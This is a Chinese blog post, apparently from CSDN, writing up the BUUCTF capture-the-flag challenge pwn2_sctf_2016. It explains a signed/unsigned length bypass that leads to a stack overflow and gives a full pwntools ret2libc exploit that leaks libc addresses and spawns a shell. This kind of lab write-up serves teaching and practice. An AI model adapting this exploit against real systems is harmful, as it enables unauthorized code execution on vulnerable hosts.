[BUUCTF-pwn]——pwn2_sctf_2016

最新推荐文章于 2023-04-18 19:24:54 发布
最新推荐文章于 2023-04-18 19:24:54 发布
阅读量515 收藏 1
点赞数
分类专栏: # 整数溢出 # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113796891
版权

[BUUCTF-pwn]——pwn2_sctf_2016

老规矩还是先checksec一下, 在这里插入图片描述
在IDA中看看, 这个get_n(a, b)的作用就是读入 b 个字符。将其合成的字符串赋值给a。
在这里插入图片描述
在这里插入图片描述
最常用的方法,也是我经常使用的方法就是利用 libc库 计算偏移。然后循环利用函数。只有printf函数可以打印, 找到需要用的地址。
在这里插入图片描述
在这里插入图片描述

思路

利用printf泄露printf的实际地址, 通过计算偏移,以此来找到system 和 ‘/bin/sh’
但是中间你会发现有个32的限制, 仔细观察 变量类型你就会发现 get_n的第二个参数的类型是 unsigned int 类型, int 类型的负数, 在这里对应的就是正数, 而且还是很大的正数。可以用来绕过检查。

注意不要如下写, 里面有 %u 孩子在这里卡了一下

p.sendlineafter("Ok, sounds good. Give me %u bytes of data!\n", payload)

exploit

from pwn import *
from LibcSearcher import *
p = remote("node3.buuoj.cn",25008)
elf = ELF("./pwn2_sctf_2016")
context.log_level = 'debug'

printf_plt = elf.plt["printf"]
printf_got = elf.got["printf"]
s_addr = 0x080486F8
vuln_addr = 0x0804852F

payload = "a" * (0x2c + 0x4) + p32(printf_plt) + p32(vuln_addr) + p32(s_addr) + p32(printf_got)
p.sendlineafter("How many bytes do you want me to read? ", '-1')

p.sendlineafter("bytes of data!\n", payload)
p.recvline()

p.recvuntil("You said: ")
printf_addr = u32(p.recv(4))

print hex(printf_addr)

libc = LibcSearcher('printf', printf_addr)
libcbase = printf_addr - libc.dump('printf')
system_addr = libcbase + libc.dump('system')
binsh = libcbase + libc.dump('str_bin_sh')

payload = "a" * (0x2c + 0x4) + p32(system_addr) + p32(vuln_addr) + p32(binsh)

p.sendlineafter("How many bytes do you want me to read? ", '-1')

p.sendlineafter("bytes of data!\n", payload)
p.interactive()

遗憾

通过旁边的do_thing函数可以找到 int 80 汇编指令。由于上一题碰到了, 这一题想试试是否可以通过execve("/bin/sh", NULL, NULL) 来解决, 我觉得应该可以不知道, 你有没有兴趣尝试一下, 做出来了。如果可以给我分享一下吗 😃
希望你可以成功哦!!!
今年大年初一, 祝大家新年快乐, 平安喜乐 😃

Y-peak
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 938
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 329
BUUCTF 做题练习
BUUCTF|PWN-pwn1_sctf_2016
Rt1Text的博客
04-23 591
1.checksec+运行 32位+NX保护
[BUUCTF]——pwn1_sctf_2016
m0_68381884的博客
03-28 496
拿到文件先检查一下 得出结论这是32位程序且开启了nx保护。 用32位ida打开文件,并使用ida分析,看到较为敏感的“get flag” 双击跟进,找到函数后按F5将其反编译得到我们熟悉的伪代码 看到这个函数的作用就是输出“flag.txt”里的内容,记一下地址flag_addr=08048F0D 进入main函数 双击 vuln 函数, 0x02 编写exp: from pwn import* r=remote("redirect.do-not-trust.h.
[BUUCTF-pwn]——pwn1_sctf_2016
Y_peak的博客
01-30 850
[BUUCTF-pwn]——pwn1_sctf_2016 题目地址:https://buuoj.cn/challenges#pwn1_sctf_2016 题目: 话不多说,先下载下来再说。 在Linux上 checksec一下,发现开启了NX保护,但是没有开启Stack的保护,也就是说我们可以很轻易的利用栈溢出。 在window的IDA上反汇编看下源码,额 ,main函数没有什么有用的信息。我们可以看下vuln函数。 发现好大一堆,发现了fgets函数,但是很遗憾。它要求我们只能输入不超过32个字符。
BUUCTF|PWN-pwn1_sctf_2016-WP
l2645470582_的博客
07-29 712
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec pwn1_sctf_2016 3、该文件是62为文件,我们用32为IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串,ctrl+x查看cat flag.txt地址 3.3、F5进入main函数反编译代码区 3.4、看到有个vuln()关键函数,双击进去 3.5、我们看见关键字变量名溢出,双击查看 s地址: r地址: ...
BUUCTF-PWN-pwn1_sctf_2016
m0_64180167的博客
04-13 541
就刚刚好满足了get的溢出 然后再输入4个垃圾字符 就可以 实现函数返回 再将 get flag返回地址填入即可。因为you占3字节 我们只能输入 32个 一个i =三个字节 所以我们输入 20个I 就可以占 60 字节。原本看别人的博客 是说replace函数替换了 但是 我看不明白 很简单的办法。然后进行发现是32 所以我们记住 如果栈溢出漏洞 我们需要4个字节填满基地址。发现get 但是只能输入 32个 所以无法实现栈溢出。发现进行了替换 这样我们就可以执行栈溢出。
BUUCTF-Pwn-pwn2_sctf_2016
餐桌上的猫
03-25 208
exp from pwn import* from LibcSearcher import * elf=ELF('/home/lhb/桌面/pwn2_sctf_2016') p=remote('node4.buuoj.cn',27385) printf_plt=elf.plt['printf'] printf_got=elf.got['printf'] main=0x80485b8 p.sendlineafter(b'read? ',b'-1') payload=b'a'*(0x2c+4)+p32(p
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1293
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
BUUCTF pwn——pwn1_sctf_2016
CNS-Enterprise BCC-1701-J
03-12 117
BUUCTF 做题练习
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3854
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3077
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 1933
[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 1778
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值